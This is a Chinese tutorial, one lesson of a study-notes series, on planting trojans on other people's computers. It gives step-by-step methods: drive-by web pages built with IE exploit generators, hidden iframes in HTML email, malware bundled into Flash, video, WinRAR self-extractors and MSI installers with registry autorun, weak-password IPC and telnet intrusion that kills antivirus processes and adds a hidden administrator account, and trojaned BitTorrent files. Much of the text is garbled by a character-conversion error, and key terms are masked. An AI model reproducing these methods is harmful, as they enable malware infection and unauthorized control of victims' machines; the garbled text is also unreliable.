***学习笔记教程六：***传播技术

　　***的原理和使用实际上是很简单的，但问题是咱们如何让咱们的***可以种植到别人的机器上呢？

　　要知道若是不能在别人计算机上种植***，那就只能在本身机器上自娱自乐了。接下来我就介绍一些***经常使用的***种植技术，但愿你们能经过学习加强防范***的意识，尽可能避免如下的一些问题。

 

第一招：网页***制做。

　　因为目前上互联网的人每每都要使用IE这个软件，因此***们都把不少的经历投入到了IE的研究上。结果就是IE的漏洞不断的被爆出。关于漏洞的具体问题，咱们在后面的章节再介绍。这里咱们提到的就是一种能够远程执行的漏洞，简单的说，就是你看了个人网页，因为你的IE有漏洞，就会自动执行我所指定的那个文件，若是这个文件是***，你就惨了。

 

　　有人把这种***方式形象的比喻成“网页挂马”，再加上跨站技术，弄得如今都人心惶惶的。（用firefox上网，危险小得多）

 

　　不过，你们可能也会有疑问：就咱这水平，连个HTML都不会写，怎么挂啊？迷糊。这就要感谢网络上的那些高手了，他们任劳任怨的为咱们写了不少漏洞利用程序。好比：老丁网页***生成器。（你们看到笔记时，可能这个漏洞早就被多数人补上了，不过不要紧，相似漏洞不断的爆，相似软件不断的出，用法差很少）。使用过程以下：

一、准备一个空间

二、配置好马儿，假设名字为mm.exe

三、打开老丁，输入http://你的地址/ma/mm.exe，再点生成网页。

四、把生成的网页laoding.htm传到服务器上，再把mm.exe传到ma这个子目录。

　　这样，只要有人访问laoding.htm这个网页就会中马啦。

第二招：邮件携带

　　用方法一作好的***传到空间上之后，就能够在写邮件的时候，选择HTML编辑方式（若是是outlook，新建邮件时点“察看”-“编辑源文件”，foxmail你本身找找看），再加入如下内容，实如今网页中包含一个框架：
"<iframe src="  [url]http://xxxxx.com/xxxx.htm[/url]" ; width="0" height="0"></iframe>"，这招够阴毒。之前试过这一招，挺好用的。

　　不过，这一招也有些问题。目前的SMTP在发信时都会把包含这个框架的邮件过滤掉。因此咱们只能本身建立MAIL服务器了。好在Mdaemon很好用，你们安装配置完在安全菜单中把框架过滤那个勾去掉就好了。用你本身的SMTP发信吧！

 

第三：在flash文件中捆绑
　　打开flashMX，新建影片或打开其它影片(.swf)，建立一个空白关键帧，选择动做－浏览器－双击geturl，输入网页地址，再点动做－影片控制－中止动做，导出电影文件便可。FLASH没怎么用过，这回才知道，原来看flash也要当心啊。

第四：视频传播
　　用realmedia editor，工具－合并事件  事先写个文本文件，内容是: u 00:5.0 00:8.0 网马网址，这样就能够了。

第五：文件捆绑
　　不说了，工具太多。把一个正常的文件和***捆绑在一块儿，在找个图标掩饰一下就行。但我要说的是：不管如何，捆绑后的扩展名都必定是".exe"。

　　若是你们没有工具，也能够用winrar捆绑。方法是把正常文件和***放在一，记录两个文件的名字。而后把两个文件都选中，右键－添加到压缩文件。再选中“建立自解压文件”。而后在“高级”-“自解压选项”中，写好压缩前运行的文件（正常文件），写好压缩后运行文件（***），再选静默模式中的所有隐藏就好了。

 

第六：经过MS较新的软件安装包MSI也能够捆绑***

　　一、取得正常安装后的文件，最好使用软件的绿色版，把全部文件和***文件放在同一个目录。

　　二、使用advance installer，到霏凡能够找到crack版。新建工程，选择专业版－新建工程向导，点击下一步、浏览选择准备好的目录。

　　三、有快捷方式的选择地方，把软件包中的主程序勾选，软件语言据实填写。

　　四、最后一步，绝对不要选：如今建立。这样就会进入下一步，软件的主程序界面。

　　五、选“文件或文件夹”，点开“windows volume”，新建一个system32，再把***拽过去，这样MSI安装完成后，***会自动放在这个目录中。

　　六、选“注册表”，在HKCU-software-microsoft-windows-current version-run中加载提到的***文件便可。（固然，若是系统中安装有瑞星这样能够监控系统注册表的软件，安装到此步时会出现提示。）

　　七、若是***支持服务启动，也能够在服务－安装服务上点右键－新建服务初始化，

　　八、在左侧菜单选“自定义操做”，在安装执行顺序下的install上右键，选新建安装的自定义操做，选中***文件，选“异步执行，不等待返回”，这样能够避免安装出现延迟，在执行选项中选确认（毫不能选当即执行）。

　　九、F7生成工程文件便可。

第七：配合扫描工具
本例可使用流光，也可使用傻瓜IPC扫描器。
　　一、用流光扫描有IPC漏洞的计算机（就是设置了弱密码计算机）
　　二、扫描完成后，点工具菜单－IPC工具－种植者
找到配置好的***文件－再选中***种植的路径－出现提示“指定的程序将在＊＊秒后执行”
　　三、等待肉鸡上线便可。
　　注：本实验成功机率较小，2003　2000等系统为防止有人加自动运行程序，做了保护。若是目标主机上有杀软，也会杀掉***。若是目标主机没有隐含共享，也没有其它共享目录，则更没法实现。

第八：手工开telnet种植
　　一、最简单就是用阿D工具包，找到其中的肉鸡扫描，找到弱密码的肉鸡后，点：打开telnet服务。　　　　　　
　　二、把查看进行和删除进行的两个程序：pslist.exe   pskill.exe  以及***文件上传到一个FTP服务器。
　　三、telnet x.x.x.x           "telnet链接目标主机

　　经过ftp链接到放了好多***软件的服务器。ftp y.y.y.y
　　mget *            "下载全部文件
　　pslist           查看全部进程
　　pskill           杀掉杀毒软件进程

　　若是杀毒软件实现关不掉（许多杀软有进程保护机制），就只好作咱们最不忍心的事儿了（删除杀毒软件的全部文件，再重启他的机器）
　　四、执行***

    五、留下后门，你们能够用如下的方法，但最好仍是克隆一个管理员账号，若是不会，就baidu一下，网上不少说明。
　　net user bob$ /add
　　net localgroup administrators bob$ /add

提示：若是关闭了ipc$共享，或对方计算机密码没法破解，此办法无效。另外，针对于不是空密码的简单密码，能够考虑在扫描工具中配合事先生成的字典。

　　第九：BT捆绑
　　一、掌握一个最新最受欢迎的电影，用如下方法之一进行捆绑
　　文件捆绑器：缺点易被发现扩展名的问题。
　　文件欺骗法：制作N个EXE文件，有的绑***，有的不绑。
　　二、用bt软件生成种子
　　三、到网站推介种子，未来下的人越多，中马的人越多。

　　第十：蜜罐种植法

　　在计算机上开一个guest可访问的共享，里边放一些捆绑了***的文件，而后就等着一些小鸟进洞吧！！！

 

　　以上提到的方法还远没有把***种马的技术说彻底（笔者水平也就这样儿了），因此***们的欺骗手段真的是防不胜防。因此，你们必定要擦亮眼睛。中个马没关系，但做为一名IT专业人士，咱可丢不起那人啊。

　　好了，这一章就到这里，敬请关注连载。